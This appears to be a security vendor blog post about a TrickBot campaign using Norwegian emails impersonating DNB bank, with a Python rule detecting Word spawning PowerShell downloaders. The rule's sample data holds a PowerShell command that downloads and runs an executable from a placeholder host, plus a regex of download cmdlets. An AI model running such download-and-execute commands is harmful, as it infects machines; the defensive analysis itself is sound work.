TrickBot In The Nordics, Episode II

The banking trojan TrickBot is not retired yet. Not in the least. In a seemingly never-ending series of spam campaigns – not via the Necurs botnet this time – we’ve spotted mails written in Norwegian that appear to be sent by DNB, Norway’s largest bank.

The mail wants the recipient to believe that they have received an important “decision letter” and that they should open the attached document for more information. It also suggests that, if there are problems reading the content, the recipient has to click the “Enable Content” button… uh oh, where have we heard that before?

Anyway, let’s take a look at the attachment “SikreDokumenter.doc” (“Secure Document”). Not that much to see here though.

“Laster Innhold” translates to “Loading content”, but that content never appears. As if it is waiting for the user to click “Enable Content”, as the mail suggests, no? Unfortunately, clicking this button still never reveals anything (how disappointing!). Instead, a Visual Basic macro launches a PowerShell script which will download and execute the TrickBot loader.
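The Word macro → PowerShell → download-and-execute chain described above is a classic detection opportunity: an Office application spawning a script host is rare on a normal desktop, and download cmdlets in the child’s command line make it a strong signal. As an added illustration (not code from the original post), the snippet below runs that logic over a few constructed Sysmon-style process-creation events; it generalises slightly beyond this campaign by covering several Office parents and script hosts.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style). These are
# made-up records for demonstration, not telemetry from the campaign described above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe');"
                    "Start-Process 'C:\\Users\\Public\\x.exe'\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE /n SikreDokumenter.doc"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a script host being used as a downloader/stager.
DOWNLOAD_PATTERNS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-expression|\biex\b|-enc\w*\s|\bhidden\b",
    re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for one process-creation event."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return "none"
    # Office -> script host alone is suspicious; download/execute cmdlets raise it further.
    hits = {m.lower() for m in DOWNLOAD_PATTERNS.findall(event["CommandLine"])}
    return "high" if hits else "medium"

def find_macro_launches(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep only events matching the Office -> script host chain, tagged with severity."""
    return [dict(e, Severity=s) for e in events if (s := classify(e)) != "none"]

if __name__ == "__main__":
    for hit in find_macro_launches(SAMPLE_EVENTS):
        print(hit["Severity"], basename(hit["ParentImage"]), "->", hit["CommandLine"][:70])
```

In a real deployment the same rule would be expressed in the SIEM/EDR query language over live process-creation telemetry; the Python here only shows the decision logic.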

And just like last time we wrote about TrickBot, a large spam campaign often goes hand in hand with a malware update. Now the authors are “celebrating” a brand new list of targets. Here’s a short summary:

  • More targeting of finance-related sites that are not traditional banks: American Express, Amazon, …
  • A few banks in Mexico, Argentina and Chile. Middle and South America, some of the last parts of the world that TrickBot hadn’t visited yet.
  • New European countries: Croatia, Slovenia, Hungary, Turkey, …
  • More banks in countries targeted before, such as Belgium, The Netherlands, Luxembourg, Germany, Spain, Italy, Poland, Singapore, Australia, New Zealand, …
  • And last but not least: the Nordic countries are back in the game.

Wait, the Nordic banks were gone? That’s right! They appeared in June, but were removed again in early August. Our guess was that attacking the Nordics turned out not to be that profitable – but now they are back, which immediately explains the localized spam.

But fear not, our security products were already protecting you against this latest campaign.

Special thanks to Päivi for the help.

